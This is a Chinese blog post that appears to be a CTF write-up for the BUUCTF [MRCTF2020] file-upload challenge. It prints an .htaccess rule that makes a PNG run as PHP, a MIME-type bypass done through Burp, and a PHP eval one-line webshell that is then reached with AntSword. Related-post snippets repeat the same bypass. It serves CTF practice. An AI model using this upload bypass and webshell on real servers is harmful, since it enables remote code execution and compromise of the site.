BUU-WEB-[MRCTF2020]你传你呢

最新推荐文章于 2022-10-25 16:21:59 发布
最新推荐文章于 2022-10-25 16:21:59 发布
阅读量234 收藏 1
点赞数
分类专栏: BUU-WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/116667346
版权

[MRCTF2020]你传你🐎呢

在这里插入图片描述
文件上传漏洞。
通过测试只能上传图片格式,于是通过.htaccess配置文件进行修改,将图片格式自动转换成php文件。
具体.htaccess作用可以百度百科一下。

.htaccess配置文件:

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

上传时使用burp修改文件格式,改成image/jpeg即可上传成功。
在这里插入图片描述
在这里插入图片描述

上传图片木马:

<?php
@eval($_POST['shell'])
?>

(不需要做任何修改,直接上传图片木马即可)
使用蚁剑连接。
在这里插入图片描述
flag在根目录下面。
在这里插入图片描述

TzZzEZ-web
关注
专栏目录
BUUCTF之[MRCTF2020]你你呢 1
qq_44122254的博客
02-10 2078
打开题目靶场,发现是一个上页面 随便上一个文件进行试验一下 发现对此文件有进行过滤 上一个图片进行尝试,发现可以上png图片,制作图片码进行上 图片码内容如下 发现可以上成功但是蚁剑连接的话并不能够连接成功,数据为空 ...
CTF——MISC习题讲解(MRCTF2020系列)
tlovejr的博客
03-08 4299
CTF——MISC习题讲解(MRCTF2020系列) 前言 上一章节我们已经做完一场比赛的杂项题目,这次给大家介绍一下MRCTF中杂项题目 一、[MRCTF2020]pyFlag 题目链接如下: 链接:https://pan.baidu.com/s/1IQWks6UXUFq5gbkpcGp9sw?pwd=t05h 提取码:t05h 首先打开题目后发现共有三张图片 老规矩,对于杂项的题目先扔到winhex或者010Editor工具进行查看 但是发现这几张图片的结尾处都是存在压缩包数据 第一张图片 第二张图
[MRCTF2020]你你呢
Sk1y的博客
03-02 2878
[MRCTF2020]你你????呢 目录 [MRCTF2020]你你????呢 上.htaccess 上1.png 蚁剑连接 题目:buu平台 解题过程: 需要上两个文件 .htaccess是什么 原文送门 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来
[MRCTF2020]你你呢 1
shinygod的博客
02-11 2147
知识点:.htaccess和.user.ini的区别 上php,phtml,txt…类型的文件都会被过滤 抓包改content-type也不行 上个jpg格式,里面有一句话木马 路径出来了,我们可以用
[MRCTF2020]你你呢1
:-)
03-31 1636
[MRCTF2020]你你????呢1 STEP1:尝试改写文件头和和文件内容 显示: 判断可能与user.ini或.htaccess文件有关 STEP2:上.htaccess文件 显示: 上成功,上一个1.png文件 STEP3:上1.png文件包含一句木马 显示: STEP4:蚁剑连接 显示: 得到flag ...
buu做题笔记——[BJDCTF2020]Mark loves cat&[MRCTF2020]Ez_bypass&[GKCTF2020]CheckIN
weixin_46330722的博客
11-05 641
BUU[BJDCTF2020]Mark loves cat[MRCTF2020]Ez_bypass [BJDCTF2020]Mark loves cat 进入题目是一个博客首页 点了半天没找到可以利用的点,用dirsearch扫一下 扫到.git目录,用Githack把源码down下来 看一下关键代码 //flag.php <?php $flag = file_get_contents('/flag'); //index.php <?php include 'flag.php';
BUUCTF之[MRCTF2020]套娃 --- 文件包含漏洞
weixin_44632787的博客
06-27 782
BUUCTF之[MRCTF2020]套娃 题目 发现什么都没有,于是鼠标右键查看一下提示。 可以看到PHP代码 <?php //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' &
MRCTF web部分复现wp
xlcvv的博客
04-05 722
一、ez_bypass 换个界面- 这个有点丑: GET两个参数:gg 和 id,md5值相同但本值不同,md5碰撞,之前有做过:,但是试了一些值都不行? 那就入的为数组,md5()函数无法处理数组,如果入数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 显示出了You got the first steponly one way to get the fl...
BUUCTF__web题解合集(十一)
风过江南乱的博客
10-04 1368
1、[GKCTF2020]EZ三剑客-EzWeb 2、[BJDCTF 2nd]elementmaster 3、[MRCTF2020]套娃 4、[FBCTF2019]RCEService 5、[WUSTCTF2020]颜值成绩查询
BUUCTF之[MRCTF2020]你你呢 1】
qq_40646572的博客
10-25 5705
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
BUUCTF:[MRCTF2020]你你呢
末初的CSDN博客
12-03 1720
https://buuoj.cn/challenges#[MRCTF2020]%E4%BD%A0%E4%BC%A0%E4%BD%A0%F0%9F%90%8E%E5%91%A2 文件上 文件后缀过滤的很全,常见的绕过方法php3/5/7/、phtml都不行 但是.htaccess可以上,只需要修改一下Content-Type为image/jpeg即可上 .htaccess AddType application/x-httpd-php .jpg 然后上一个含有一句话的jpg文件即可被当作p
BUUCTF Web [MRCTF2020]你你呢1 & [极客大挑战 2019]HardSQL1
网安小趴菜
09-07 833
BUUCTF Web [MRCTF2020]你你🐎呢1 & [极客大挑战 2019]HardSQL1
upload-labs 04(上.htaccess)
LuckySec
11-05 2245
题目 首先查看源码 该代码对常见的多种类型文件后缀名进行了限制上, 但是仔细可以发现,并没有对htaccess文件进行限制。 于是,我们可以先上一个htaccess文件,再上一个图片马,进行绕过检测上。 htaccess小知识 .htaccess文件(或者&amp;amp;quot;分布式配置文件&amp;amp;quot;),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中...
[MRCTF2020] web题-你你ma呢
BROTHERYY的博客
08-18 722
复现环境:buuoj.cn 跟祖安人打个招呼吧~ 上.jpg的马子 复制路径 /var/www/html/upload/9a5ee638f8d54695e513b45bd66602c7/1.jpg 上.htaccess解析jpg 到根目录找flag flag{f36857f9-ac68-4756-b791-4ce7f2c8f393}
BUUCTF——[MRCTF2020]你你呢 1
weixin_45864041的博客
09-28 1319
php文件格式的一句话木马。 上失败。那就先jpg文件 发现上成功。然后我们可以先把路径保存下来。 接下来我们再试一下可不可以通过抓包修改的方式上php文件。 发现上失败。然后,我们又得变换思路了。上一篇文章,我们知道目录下有一个index.php文件,然后我们通过上.user.ini文件让图片被当做php文件解析。接下来我想到一个思路,那就是.htaccess文件。.htaccess文件可以用来留后门和针对黑名单绕过,可以在.htaccess 加入php解析规则,就能够使上的jpg/.
buu Quoted-printable
最新发布
09-13
根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值